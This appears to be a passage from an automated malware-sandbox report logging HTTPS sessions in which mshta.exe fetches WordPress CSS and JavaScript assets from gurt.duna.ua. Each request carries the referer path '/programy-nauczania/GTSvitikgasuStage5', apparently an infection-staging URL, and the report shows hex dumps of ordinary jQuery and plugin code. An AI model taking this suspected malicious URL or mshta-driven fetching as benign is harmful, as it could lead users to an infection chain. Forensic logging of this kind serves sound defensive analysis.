                                                                                                                                                                                                      Data Ascii: 4;display:block;font-size:32px;font-weight:bolder;margin:0;text-decoration:none;text-transform:uppercase}.logo img{display:block;width:auto}.header-logo-dark,.header-logo-sticky,.nav-dark .header-logo,.sticky .dark .header-logo-dark,.sticky .has-sticky-lo


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      22192.168.2.549732185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:20 UTC451OUTGET /wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:20 GMT
                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                      Content-Length: 24163
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:50:41 GMT
                                                                                                                                                                                                      ETag: "64e09071-5e63"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:20 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC16051INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 2e 62 6c 6f 63 6b 55 49 2e 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 2d 72 65 76 69 65 77 2d 6f 72 64 65 72 20 2e 62 6c 6f 63 6b 55 49 2e 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 70 61 63 69 74 79 3a 2e 36 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 2e 62 6c 6f 63 6b 55 49 2e 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63
                                                                                                                                                                                                      Data Ascii: @charset "utf-8";.widget_shopping_cart_content .blockUI.blockOverlay,.woocommerce-checkout-review-order .blockUI.blockOverlay{background-color:#fff!important;opacity:.6!important}.widget_shopping_cart_content .blockUI.blockOverlay:before,.woocommerce-chec
                                                                                                                                                                                                      2024-10-27 06:35:21 UTC8112INData Raw: 6f 74 74 6f 6d 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 65 6d 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 3a 33 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 72 69 67 68 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 32 30 7d 2e 73 74 69 63 6b 79 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 2d 61 63 74 69 76 65 20 2e 76 61 72 69 61 74 69 6f 6e 73 2c 2e 73 74 69 63 6b 79 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 2d 61 63 74 69 76 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 76 61 72 69 61 74 69 6f 6e 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 74 69 63 6b 79 2d 61 64 64 2d
                                                                                                                                                                                                      Data Ascii: ottom:0;display:flex;flex-wrap:wrap;font-size:.9em;justify-content:center;left:0;padding:3px;position:fixed;right:0;z-index:20}.sticky-add-to-cart--active .variations,.sticky-add-to-cart--active .woocommerce-variation-description{display:none}.sticky-add-


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      23192.168.2.549735185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:22 UTC474OUTGET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=1.3.4.2 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:22 UTC347INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:22 GMT
                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                      Content-Length: 16030
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:51:11 GMT
                                                                                                                                                                                                      ETag: "64e0908f-3e9e"
                                                                                                                                                                                                      x-ray: wnp447:0.010/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:22 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:22 UTC16030INData Raw: 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 63 6c 61 73 73 20 48 75 73 6b 79 54 65 78 74 20 7b 0a 20 20 20 20 63 6f 6e 73 74 72 75 63 74 6f 72 28 69 6e 70 75 74 2c 20 64 61 74 61 20 3d 20 7b 7d 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 73 65 61 72 63 68 65 64 5f 76 61 6c 75 65 20 3d 20 27 27 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 20 3d 20 30 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 64 61 74 61 20 3d 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 20 64 61 74 61 29 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 70 75 74 20 3d 20 69 6e 70 75 74 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 69 74 5f 69 6e 70 75 74 28 29 3b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65
                                                                                                                                                                                                      Data Ascii: 'use strict';class HuskyText { constructor(input, data = {}) { this.searched_value = ''; this.current_page = 0; this.data = Object.assign({}, data); this.input = input; this.init_input(); this.containe


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      24192.168.2.549741185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC430OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC348INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:23 GMT
                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                      Content-Length: 89684
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Sat, 19 Aug 2023 09:52:45 GMT
                                                                                                                                                                                                      ETag: "64e090ed-15e54"
                                                                                                                                                                                                      x-ray: wnp447:0.011/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:23 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC16036INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                      Data Ascii: /*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC16384INData Raw: 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 26 26 72 5b 32 5d 2c 61 3d 73 26 26 63 2e
                                                                                                                                                                                                      Data Ascii: ile(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1])&&r[2],a=s&&c.
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC16384INData Raw: 3d 3d 3d 77 28 6e 29 29 66 6f 72 28 73 20 69 6e 20 69 3d 21 30 2c 6e 29 42 28 65 2c 74 2c 73 2c 6e 5b 73 5d 2c 21 30 2c 6f 2c 61 29 3b 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 69 3d 21 30 2c 6d 28 72 29 7c 7c 28 61 3d 21 30 29 2c 6c 26 26 28 61 3f 28 74 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 6e 75 6c 6c 29 3a 28 6c 3d 74 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c 28 53 28 65 29 2c 6e 29 7d 29 29 2c 74 29 29 66 6f 72 28 3b 73 3c 75 3b 73 2b 2b 29 74 28 65 5b 73 5d 2c 6e 2c 61 3f 72 3a 72 2e 63 61 6c 6c 28 65 5b 73 5d 2c 73 2c 74 28 65 5b 73 5d 2c 6e 29 29 29 3b 72 65 74 75 72 6e 20 69 3f 65 3a 6c 3f 74 2e 63 61 6c 6c 28 65 29 3a 75 3f 74 28 65 5b 30 5d 2c 6e 29 3a 6f 7d 2c 5f 3d 2f
                                                                                                                                                                                                      Data Ascii: ===w(n))for(s in i=!0,n)B(e,t,s,n[s],!0,o,a);else if(void 0!==r&&(i=!0,m(r)||(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(S(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},_=/
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC16384INData Raw: 29 2c 66 3d 69 65 28 65 29 3b 69 66 28 21 28 76 2e 6e 6f 43 6c 6f 6e 65 43 68 65 63 6b 65 64 7c 7c 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 31 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 29 29 66 6f 72 28 61 3d 79 65 28 63 29 2c 72 3d 30 2c 69 3d 28 6f 3d 79 65 28 65 29 29 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 73 3d 6f 5b 72 5d 2c 75 3d 61 5b 72 5d 2c 76 6f 69 64 20 30 2c 22 69 6e 70 75 74 22 3d 3d 3d 28 6c 3d 75 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 3f 75 2e 63 68 65 63 6b 65 64 3d 73 2e 63 68 65 63 6b 65 64 3a 22 69 6e 70 75 74 22 21 3d 3d 6c 26 26 22 74 65 78 74 61 72 65 61 22 21 3d 3d 6c 7c 7c 28 75 2e 64 65
                                                                                                                                                                                                      Data Ascii: ),f=ie(e);if(!(v.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||S.isXMLDoc(e)))for(a=ye(c),r=0,i=(o=ye(e)).length;r<i;r++)s=o[r],u=a[r],void 0,"input"===(l=u.nodeName.toLowerCase())&&pe.test(s.type)?u.checked=s.checked:"input"!==l&&"textarea"!==l||(u.de
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC16384INData Raw: 74 28 65 2c 72 29 3b 74 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 7d 7d 29 7d 2c 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 69 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74 22 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 70 74 69 6f 6e 22 29 29 2c 72 74 2e 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 2c 76 2e 63 68 65 63 6b 4f 6e 3d 22 22 21 3d 3d 72 74 2e 76 61 6c 75 65 2c 76 2e 6f 70 74 53 65 6c 65 63 74 65 64 3d 69 74 2e 73 65 6c 65 63 74 65 64 2c 28 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 76 61 6c 75 65 3d 22 74 22 2c 72 74 2e
                                                                                                                                                                                                      Data Ascii: t(e,r);t.stop=function(){C.clearTimeout(n)}})},rt=E.createElement("input"),it=E.createElement("select").appendChild(E.createElement("option")),rt.type="checkbox",v.checkOn=""!==rt.value,v.optSelected=it.selected,(rt=E.createElement("input")).value="t",rt.
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC8112INData Raw: 22 62 6f 64 79 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 28 74 68 69 73 29 2e 72 65 70 6c 61 63 65 57 69 74 68 28 74 68 69 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7d 29 2c 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 28 65 29 7d 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67
                                                                                                                                                                                                      Data Ascii: "body").each(function(){S(this).replaceWith(this.childNodes)}),this}}),S.expr.pseudos.hidden=function(e){return!S.expr.pseudos.visible(e)},S.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().length)},S.ajaxSetting


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      25192.168.2.549747185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC458OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC346INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:23 GMT
                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                      Content-Length: 9679
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Fri, 10 Sep 2021 13:16:34 GMT
                                                                                                                                                                                                      ETag: "613b5ab2-25cf"
                                                                                                                                                                                                      x-ray: wnp447:0.010/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:23 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:23 UTC9679INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 72 65 66 72 65 73 68 20 63 61 72 74 20 77 68 65 6e 20 70 61 79 6d 65 6e 74 20 6d 65 74 68 6f 64 20 63 68 61 6e 67 65 64 0a 20 20 20 20 20 2a 2f 0a 20 20 20 20 69 66 20 28 61 77 64 72 5f 70 61 72 61 6d 73 2e 72 65 66 72 65 73 68 5f 6f 72 64 65 72 5f 72 65 76 69 65 77 20 3d 3d 20 27 31 27 29 20 7b 0a 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 27 63 68 61 6e 67 65 27 2c 20 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 70 61 79 6d 65 6e 74 5f 6d 65 74 68 6f 64 22 5d 2c 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 62 69 6c 6c 69 6e 67 5f 63 69 74 79 22 5d 2c 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 62 69 6c 6c 69 6e 67 5f 70 6f 73 74 63 6f 64 65 22 5d 27 2c 20 66
                                                                                                                                                                                                      Data Ascii: (function ($) { /** * refresh cart when payment method changed */ if (awdr_params.refresh_order_review == '1') { $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', f


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      26192.168.2.549753185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:24 UTC467OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:25 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:24 GMT
                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                      Content-Length: 3053
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Fri, 10 Sep 2021 13:16:34 GMT
                                                                                                                                                                                                      ETag: "613b5ab2-bed"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:24 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:25 UTC3053INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 24 2e 65 78 74 65 6e 64 28 7b 0a 20 20 20 20 20 20 20 20 41 64 76 61 6e 63 65 57 6f 6f 44 69 73 63 6f 75 6e 74 52 75 6c 65 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 6d 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 64 75 63 74 5f 69 64 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 71 75 61 6e 74 69 74 79 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 74 69 6f 6e 73 3a 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 65 74 44 79 6e 61 6d 69 63 44 69 73 63 6f 75 6e 74 50 72 69 63 65 46 72 6f 6d 43 61 72 74 46 6f 72 6d 3a 20 66 75 6e 63 74 69 6f 6e 28 24
                                                                                                                                                                                                      Data Ascii: (function ($) { $.extend({ AdvanceWooDiscountRules: { form: null, product_id: null, quantity: 0, options: [], target: null, getDynamicDiscountPriceFromCartForm: function($


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      27192.168.2.549754185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-27 06:35:24 UTC482OUTGET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:25 UTC344INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:24 GMT
                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                      Content-Length: 891
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Wed, 03 Nov 2021 13:55:03 GMT
                                                                                                                                                                                                      ETag: "618294b7-37b"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:24 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:25 UTC891INData Raw: 6a 51 75 65 72 79 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 6a 51 75 65 72 79 28 20 22 2e 77 70 63 66 37 22 20 29 0d 0a 09 09 2e 6f 6e 28 20 27 77 70 63 66 37 6d 61 69 6c 73 65 6e 74 27 2c 20 66 75 6e 63 74 69 6f 6e 28 20 65 20 29 20 7b 0d 0a 09 09 09 76 61 72 20 67 74 6d 34 77 70 5f 63 66 37 66 6f 72 6d 69 64 20 3d 20 27 28 6e 6f 74 20 73 65 74 29 27 3b 0d 0a 09 09 09 69 66 20 28 20 65 20 26 26 20 65 2e 64 65 74 61 69 6c 20 26 26 20 65 2e 64 65 74 61 69 6c 2e 63 6f 6e 74 61 63 74 46 6f 72 6d 49 64 20 29 20 7b 0d 0a 09 09 09 09 67 74 6d 34 77 70 5f 63 66 37 66 6f 72 6d 69 64 20 3d 20 65 2e 64 65 74 61 69 6c 2e 63 6f 6e 74 61 63 74 46 6f 72 6d 49 64 3b 0d 0a 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 65 20 26 26 20 65 2e 6f 72 69 67 69 6e 61 6c
                                                                                                                                                                                                      Data Ascii: jQuery( function() {jQuery( ".wpcf7" ).on( 'wpcf7mailsent', function( e ) {var gtm4wp_cf7formid = '(not set)';if ( e && e.detail && e.detail.contactFormId ) {gtm4wp_cf7formid = e.detail.contactFormId;} else if ( e && e.original


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      28192.168.2.549767185.68.16.1894436500C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
